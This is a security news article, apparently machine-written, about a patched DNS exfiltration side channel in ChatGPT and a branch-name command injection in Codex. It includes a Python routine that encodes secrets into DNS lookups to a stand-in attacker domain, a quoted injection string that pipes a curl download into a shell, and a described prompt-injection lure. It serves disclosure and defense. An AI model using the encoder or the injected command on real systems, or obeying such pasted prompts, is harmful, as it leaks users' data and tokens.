Ethical Hacking News
A critical vulnerability has been discovered in OpenAI's ChatGPT, alongside a command injection flaw in its Codex agent, allowing sensitive data to be exfiltrated without user knowledge or consent. The findings are a stark warning that organizations need to implement their own security layer to counter prompt injection and other unexpected behavior in AI systems.
Cybersecurity researchers at Check Point uncovered a previously unknown vulnerability in ChatGPT that allows sensitive conversation data to be exfiltrated without user knowledge or consent. Both this flaw and the related Codex issue were reported to OpenAI on December 16, 2025, and patched as of February 5, 2026.
The vulnerability, discovered through responsible disclosure, exploits a side channel originating from the Linux runtime the artificial intelligence (AI) agent uses for code execution and data analysis. Specifically, it abuses a hidden DNS-based communication path as a "covert transport mechanism," encoding information into DNS requests to bypass visible AI guardrails.
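To make the transport mechanism concrete, the sketch below shows the general technique of encoding data into DNS lookup names. This is an illustrative reconstruction, not Check Point's actual payload; the domain `exfil.example` and the function name are hypothetical. Because resolvers forward unknown names to the domain's authoritative server, each lookup delivers a chunk of data to an attacker who controls that server, even when other outbound traffic is blocked.

```python
import base64

MAX_LABEL = 63  # DNS labels are capped at 63 bytes (RFC 1035)

def encode_queries(secret: bytes, attacker_domain: str = "exfil.example") -> list[str]:
    """Encode arbitrary bytes as a series of DNS lookup names.

    Base32 keeps the payload inside the hostname character set; splitting
    it into 63-character chunks respects the per-label length limit.
    """
    payload = base64.b32encode(secret).decode("ascii").rstrip("=").lower()
    chunks = [payload[i:i + MAX_LABEL] for i in range(0, len(payload), MAX_LABEL)]
    # One lookup per chunk: "<seq>.<chunk>.<attacker domain>". The attacker's
    # authoritative name server logs every query and reassembles the data.
    return [f"{seq}.{chunk}.{attacker_domain}" for seq, chunk in enumerate(chunks)]
```

The sequence-number label lets the receiver reorder chunks, since DNS queries may arrive out of order or be retried.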
The same vulnerability could be used to establish remote shell access inside the Linux runtime and achieve command execution. This creates a significant security blind spot, because the AI system assumes the environment is isolated. As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or to improve ChatGPT's performance.
"Don't assume AI tools are secure by default," warned Eli Smadja, head of research at Check Point Research. Instead, he emphasized the importance of independent visibility and layered protection between organizations and AI vendors.
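One such protective layer, given the DNS side channel described above, is deny-by-default egress filtering of the runtime's DNS traffic. The sketch below shows the core check only; the allowlist entries are hypothetical, and a real deployment would enforce this at a resolver or egress proxy rather than in application code.

```python
# Hypothetical allowlist: domains the agent runtime legitimately needs.
ALLOWED_SUFFIXES = ("github.com", "pypi.org")

def is_query_allowed(qname: str, allowed: tuple[str, ...] = ALLOWED_SUFFIXES) -> bool:
    """Deny-by-default DNS egress check: permit a lookup only when the
    name is an allowlisted domain or a subdomain of one."""
    name = qname.rstrip(".").lower()  # normalize trailing dot and case
    # Matching on "." + suffix prevents lookalikes such as "evilgithub.com".
    return any(name == s or name.endswith("." + s) for s in allowed)
```

Under this policy, a covert-channel lookup against an attacker-controlled domain is simply never resolved, which neutralizes DNS-based exfiltration regardless of what the prompt convinced the model to do.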
The ChatGPT flaw is not the only critical issue recently uncovered in OpenAI's tooling. A command injection vulnerability in Codex, OpenAI's cloud-based software engineering agent, could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository.
According to BeyondTrust Phantom Labs researcher Tyler Jespersen, the vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter. This can result in the theft of a victim's GitHub User Access Token – the same token Codex uses to authenticate with GitHub.
The issue stems from improper input sanitization when processing GitHub branch names during task execution on the cloud. As a result, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens.
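The difference between the vulnerable and hardened patterns can be sketched as follows. The helper names are hypothetical and this is not OpenAI's actual code; it only illustrates why interpolating an attacker-controlled branch name into a shell command string is dangerous, and how argv-style execution plus input validation closes the hole.

```python
def build_checkout_unsafe(branch: str) -> str:
    # VULNERABLE pattern: the branch name is interpolated into a shell
    # string, so a value like "main; curl https://evil.example | sh"
    # becomes two commands once the string reaches a shell.
    return f"git checkout {branch}"

SHELL_METACHARACTERS = set(" ;|&$`<>(){}\n\t\"'\\")

def build_checkout_safe(branch: str) -> list[str]:
    # Hardened pattern: validate the name, then build an argv list to run
    # without a shell (e.g. subprocess.run(argv)), so metacharacters are
    # never interpreted. "--" stops git from parsing the name as an option.
    if not branch or branch.startswith("-") or SHELL_METACHARACTERS & set(branch):
        raise ValueError(f"rejected suspicious branch name: {branch!r}")
    return ["git", "checkout", "--", branch]
```

The safe variant follows the standard remediation for this bug class: treat the branch name as a single opaque argument, never as shell syntax, and reject names that could not be valid git refs anyway.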
Successful exploitation could grant lateral movement and read/write access to a victim's entire codebase. The vulnerability affected the ChatGPT website, the Codex CLI, the Codex SDK, and the Codex IDE Extension. Fortunately, OpenAI patched the issue as of February 5, 2026, after it was reported on December 16, 2025.
As AI agents become more deeply integrated into developer workflows, the security of the containers they run in – and the input they consume – must be treated with the same rigor as any other application security boundary. The attack surface is expanding, and the security of these environments needs to keep pace.
Related Information:
https://www.ethicalhackingnews.com/articles/A-Critical-Flaw-in-AI-Powered-Conversations-Uncovering-the-Vulnerabilities-in-OpenAIs-ChatGPT-and-Codex-ehn.shtml
https://thehackernews.com/2026/03/openai-patches-chatgpt-data.html
https://blog.checkpoint.com/research/when-ai-trust-breaks-the-chatgpt-data-leakage-flaw-that-redefined-ai-vendor-security-trust/
https://cloud.google.com/security/resources/insights/apt-groups
https://www.socinvestigation.com/comprehensive-list-of-apt-threat-groups-motives-and-attack-methods/
https://attack.mitre.org/tactics/TA0008/
https://www.cynet.com/network-attacks/lateral-movement-challenges-apt-and-automation/
https://apt.etda.or.th/cgi-bin/listgroups.cgi
Published: Mon Mar 30 14:45:30 2026 by llama3.2 3B Q4_K_M